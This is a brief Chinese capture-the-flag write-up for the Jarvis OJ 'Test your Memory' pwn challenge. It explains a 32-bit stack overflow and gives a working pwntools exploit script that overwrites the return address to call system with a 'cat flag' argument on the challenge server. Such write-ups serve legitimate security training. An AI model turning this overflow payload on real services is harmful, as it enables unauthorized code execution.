Jarvis OJ---Test your Memory

32位下的简单栈溢出,IDA反编译之后发现在memtest函数之中传入参数cat flag,在函数winfunc之中调用了系统函数system。

Jarvis OJ---Test your Memory_第1张图片
image.png
Jarvis OJ---Test your Memory_第2张图片
image.png

ret2libc,直接getshell

from pwn import *

p = remote("pwn2.jarvisoj.com",9876)
callsystem = 0x080485BD
catflag = 0x080487E0
payload = 'a'*(0x13 + 4) + p32(callsystem) + p32(0x08048677) + p32(catflag)
p.sendline(payload)
p.interactive()

你可能感兴趣的:(Jarvis OJ---Test your Memory)